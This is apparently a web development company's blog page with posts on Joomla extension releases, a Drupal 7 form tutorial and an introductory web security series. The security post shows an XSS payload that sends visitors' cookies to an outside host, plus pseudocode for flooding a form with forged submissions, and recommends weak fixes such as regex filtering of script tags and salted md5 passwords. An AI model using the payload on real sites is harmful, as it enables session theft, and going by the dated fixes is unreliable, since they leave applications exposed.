Simple Responsive Image Gallery for Joomla

Today we are releasing another free and open source Joomla extension –  Simple Responsive Image Gallery.

As the name of the extension indicates, it’s a simple, lightweight and fully responsive image gallery which also supports HiDPI/retina devices. There is almost zero configuration required and it works out of the box. All you have to do is select the folder from where the module will pick the images. It automatically generates thumbnails for the images under selected folder.

What makes it different and refreshing is that it doesn’t use the boring popup/lightbox effect for showing the image. Instead, it shows in inline with the page with a nice and clean effect. Check the demo here – Demo.

To use the HiDPI/Retina device support, you need all images in double (@2x) size. Default size for thumbnails is 240px x 150px and for fullscreen 960px x 600px. It’s 480px x 300px for thumbnails and 1920px x 1200px for fullscreen images. If a file’s full screen filename is ABC.png then leastjs will automatically request for ABC@2X.png when it detects HiDPI device. All you have to do is have two files as per above mentioned naming convention.

Module is currently pending review in JED hence you can directly download it from here till it becomes available on JED.

This module is based on leastjs jQuery plugin by Kamil Czujowski . 

 

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

We are one of the TOP 25 web design and development companies in Delhi NCR

We are very proud to share the news that popular IT magazine and portal Silicon India has rated us as one of the top 25 web design and development companies in Delhi NCR region. It’s a huge achievement for us and I take this opportunity to thank our clients, partners and our design and development team for making this happen.

sopan technologies was rated as one of the top 25 companies in Delhi NCR

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Frontpage Carousel for Joomla

We are proud to release yet another free and open source Joomla extension Frontpage Carousel. It allows you to show articles from one or more categories from your Joomla site in a nice carousel view. The carousel is inspired from YUI carousel however it’s written in Mootools since YUI and Mootools don’t play well together. Demo of the extension is now available on our Joomla extension’s demo site.

Here is a screenshot of the module.

module

It might take a couple of weeks before the listing on Joomla Extension Directory goes live however it’s available for direct download on our site along with our other free Joomla extensions. Download here and enjoy this free extension!

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

JConverter 1.2 beta released

Following up the previous post about JConverter 3.x compatible version, we are happy to announce the release of JConverter 1.2 beta which works with latest version of Joomla 3.x. We have tested it with Joomla 3.1.5 and it works great :)

This release is available along with the standard 2.5 compatible release JConverter 1.2  so when you purchase one, you get both. There is a limitation in the 3.x compatible release due to which it can’t import comments from WordPress into Joomla. That is because of JConverter’s dependency on JComments extension. As soon as 3.x compatible version of JComments is released, we’ll add the support for the same.

You can download JConverter here - http://extensions.joomla.org/extensions/migration-a-conversion/data-import-a-export/10237

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

JConverter for Joomla 3.0 coming soon!

Considering the numerous requests for making JConverter Joomla 3.x compatible, we have been working on it since last couple of weeks. The extension works great with Joomla 3.x, we have tested it with latest stable version of Joomla (3.1.5) as on today. However there are a few things remaining due to which the launch of 3.x compatible JConverter might take another week or so.

First is the design, since 3.x Joomla uses twitter bootstrap’s responsive template by default, we had to change all the templates/views of extension, a couple of them are yet to be fixed. Secondly, JConverter integrates with popular comments extension JComments for importing comments from WordPress but the problem is that there is no 3.x compatible version of JComments yet, which means import comments functionality won’t be available most likely in 3.x compatible release. We thought of integrating it with another comments system which is compatible with 3.x however we simply couldn’t find a comments extension which is as popular as JComments and is open source as well. We are hoping they’ll release the 3.x compatible version soon.

If you haven’t yet decided to move to 3.x then you can go here to download JConverter for your 2.5 site – Download. Stay tuned for launch update on 3.x compatible release of JConverter.

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Dog Boarding in Sweden

For past couple of months, one of our team is working on a exciting project called Tasspass. Tasspass is a concatenation of two Swedish words – Tass and Pass, Tass means “paw” and Pass means “home”.

Screenshot from 2013-04-08 15:29:25

Tasspass is one of the very first dog boarding site in Sweden. We have developed the site from scratch including logo and website design.

We are glad to share the news that tasspass.se is launching today. We are very proud to be associated with Tasspass and we firmly believe that it’ll do very well in days to come. We wish them luck and success.

Happy (dog) boarding!!

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Web Applications Security – Forms, when not well formed

Over whelming responses on the part 1 of this series was awesome, lots of queries via twitter and bunch of good comments excited me to write on higher frequency, taking a note of same now. As promised to provide solution to query asked in part 1, it flows down below:

Practically there will be lots of address and lots of things that you can pass on as gift and for sure, it would be a better idea to do something like this:

// let us assume that current user will send gift as a deliverable to himself/herself
// we will address the issue to send the gift to her/him in upcoming days
if(isUserRegisteredWithAddress(address)){
performDelivery("gift","address");
}

We will continue toward better solutions throughout the series but don’t hesitate to post your just now.

Okay, let’s fasten our seat belts again to have a fast paced ride.

When I asked many developers which is the most important tag you think?  Most of them answered <form> tag because it is the thing that does everything way round between site and its user.

As a security concern <form> tag is “the one” tag which needs to be taken care of the most, lets discuss the various security concerns with this element, later we will discuss various approach to solve these concerns.

1. Cross site scripting

The de’facto well known hack out there using javascript. Let’s see how it works. Consider a form like this:

<form action="SaveReview" method="GET">
  Your name: <input type="text" name="name">
  Your review: <input type="text" name="review">
  <input type="submit" value="Submit">
</form>

Okay, now there comes an user and enter his name prady and in the review field enters this:

<script>
document.location = 'http://pradeep-kumar.in/stealCookies?cookies=' + document.cookie;
</script>

You probably take review of particular user to show it somewhere on your site. You tried to show prady’s reviews and what’s this? He got cookies of different users. Your users being dumped in someway other.

2. Spoofed form submission

Now for the above form, someone can easily program bogus form submissions. That can be done something like below by anyone in any technology of his/her choice

//initialize variables
name=prady;
review=review;
WHILE(1){
//initiate a new http request and repeatably forge
request='http://yoursite.com/saveReview?name=' + name + '&amp;review=' + review;
name=randomize(name);
review=randomize(review);
}

Your site will be overwhelming by reviews in a very short period of time.

Fixing the problems

Lets discuss a fix for XSS attack. We can dis-allow <script> tag by using regular expressions in our controller for saving new reviews. Most of the frameworks and CMS do that for you, take care of this issue for code re-use and better maintainability.

Now comes forged formed submission. Here we can include a encrypted form number in a hidden field in form and save the same somewhere on server, when user submits form, we can cross check the validity of form itself by matching form number in GET request against stored ones on server.

These are just some fixes to the problems, most of them already taken care like most browsers doesn’t allow cross-domain ajax requests just because of existence of  XSS there. So, script posted above will not work in modern browsers. Please post your solutions to problems in the comments and stay tuned for next post.

See you soon.

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Dynamic Forms with Drupal 7 FAPI and form states

When it comes to fast paced delivery with better managed things nothing beats Content Management Frameworks, yes there are few outs, but the king Drupal 7 still is far better than its counters just because of de-normalized structure of underlying database and best ever flexibility of taxonomies and relations. Last few days for one of our team working on Drupal 7 were really challenging and I really could not managed to not to log our learnings here , so here we go!
Okay, let me first tell what we were expected to do:

Dynamic loading of multiple fields of a form based on selected fields

Having implemented dependent-dropdowns  recently, we were aware that D7 respects ajax too much.

We as usual made direction towards Examples Module, we get following code there:

$form['dropdown_first'] = array(
‘#type’ => ‘select’,
‘#title’ => ‘Instrument Type’,
‘#options’ => $options_first,
‘#default_value’ => $selected,
‘#ajax’ => array(
‘callback’ => ‘ajax_example_dependent_dropdown_callback’,
‘wrapper’ => ‘wrap’,
));

$form['dropdown_second'] = array(
‘#type’ => ‘select’,
‘#title’ => $options_first[$selected],
‘#prefix’ => ‘< div id=”wrap” >’,
‘#suffix’ => ‘< /div >’);

In the above code on selection of dropdown_first,  dropdown_second gets values from server via an ajax request and replaces elements inside ‘wrap’. We thought what if we put this wrapper around whole of the form element, we delve for same and a comment on this D7 node turned to be a real catalyst.

We tried following and we were sailing in a short period of time:

//*1 and *2 make form dependent on selected solution area
//*1–define properties for solution area
$form['field_select_a_solution_to_revie']['und']['#ajax'] = array(
‘event’ => ‘autocompleteSelect’,
‘wrapper’ => ‘wrapper-vendor-review’,
‘callback’ => ‘solution_area_selected_ajax_callback’,
‘method’ => ‘replace’,
);

//*2–define properties for form
$form['#prefix'] = ‘<div id=”wrapper-vendor-review”>’;
$form['#suffix'] = ‘</div>’;

And below is some of the code that we used in solution_area_ajax_callback()

$form_state['input']= array();
$form_state['rebuild'] = TRUE;
$empty_form = drupal_rebuild_form(‘comment_node_vendor_profile_form’,&$form_state, null );
$empty_form['field_select_a_solution_to_revie']['und']['#value'] = taxonomy_term_load($tid)->name;
return $empty_form;

This was only a peek how to achieve multi-field dependency in drupal. There are more exciting ways in which FAPI and form-states are proven real powers, depends how we exploit them. As a small bonus, soon going to write on achieving transitive dependency of different fields in drupal forms. Stay tuned !

Our handle on twitter is @sopantech, see you there.

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Web Applications Security – Introduction

As a matter of fact we all make mistakes. Some of us learn from them and others just ignore. But when it comes to the web applications that we develop, there should be no point of making mistakes, because our mistakes can cause a huge loss of business and in some cases loss of life! Here mistakes refer to architectural mistakes, UX mistakes and many others. But the most prominent one is mistakes made in security, leaving the loop-holes, that can be used by others to harm your application. Being on web means open for everyone, leaving open-gates there means you are inviting everyone.

When I started writing this blog I wanted to cover overview of web-applications security in a single blog-post but as you know security is a vast subject and can’t be covered in a single blog post, i decided to divide this in a blog series. So, here comes the first.

For the upcoming posts you can subscribe to our blog. I know you are a social animal, that’s why we are on Facebook, like us there and stay connected. For the tweeples a bonus : @sopantech

So you as a developer think that you need to develop things that work. Better think this from now – “I develop things that work only in certain conditions”. Okay enough said, now think your web-application is being hacked. What to do next, you have something in backup? No.. Now here comes rule 1:

Have a backup plan Whether or not you have a backup plan. Have one now. Who knows your application may just sink when you test different vulnerabilities against your application, that we are going to discuss in upcoming days. I have three type of user in my web-application one can do this another can do that….but one can do this also….wait a minute. Look rule 2:

Least Privilege Give user not more than what they actually need. If a user is meant for only data entry whats the use of giving him/her privileges for viewing past data. They may get all past data and misuse it. Data is valuable.

Minimum Exposure Yes, Data is valuable don’t show it all, important information like Credit Card Numbers, Passwords must be given a due care. Saving hashed password with md5 algorithm with a salt added gives another layer of security when peoples with wrong intention compromise your database.

Trade-off between usability and security A trade-off between space and time is well known but when it comes to security, smart decisions are to be taken to keep usability at good levels.

Don’t correct any data If user is passing data, force them to provide correct data rather than correcting it. For example you don’t want to give access to parent directory for any user. So, you replaced “..” with “.” , but what if someday hacker put in “…” ?

Its all about connections Most of the security breaches are found where exists some ‘connection’ between two entities. These entities can be client-server , database and application, API and its accessing clients. Let’s have an example for these. Suppose you have a form:

<form action="deliverGift" method="GET" name="myform">
<select name="gift">
<option value="watch">Watch</option>
<option value="popcorns">Popcorns</option>
<option value="sandwitch">Sandwitch</option>
</select>
<input type="hidden" name="address" size="25" value="heaven on earth" />
</form>

… and somewhere in deliverGift you wrote: performDelivery( “gift”,”address”); but the story doesn’t end here. What if the user makes a spoofed HTTP GET requested in the form:

 /deliverGift?gift=keyboard&address=usa 

In such case your application will end up in delivering a keyboard to usa, that’s you certainly don’t want! A cure to this problem is:

// updated code
if(gift==watch) {
performDelivery("gift","address"); 
} 
if(gift==popcorn) { 
performDelivery("gift","address"); 
}
if(gift==sandwitch) { 
performDelivery("gift","address"); 
}

or you can go with some switch case construct.

That would work fine. But better use following code:

if(gift==watch OR gift==popcorn OR gift==sandwitch){ 
performDelivery("gift","address");
}

But it’s not over, you are leaving a loop-hole for wrong address!

Please try to solve out by yourself and post your solution in comment. Solution will be included in next blog post.

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

© 2014 Sopan Technologies

Theme by Anders NorenUp ↑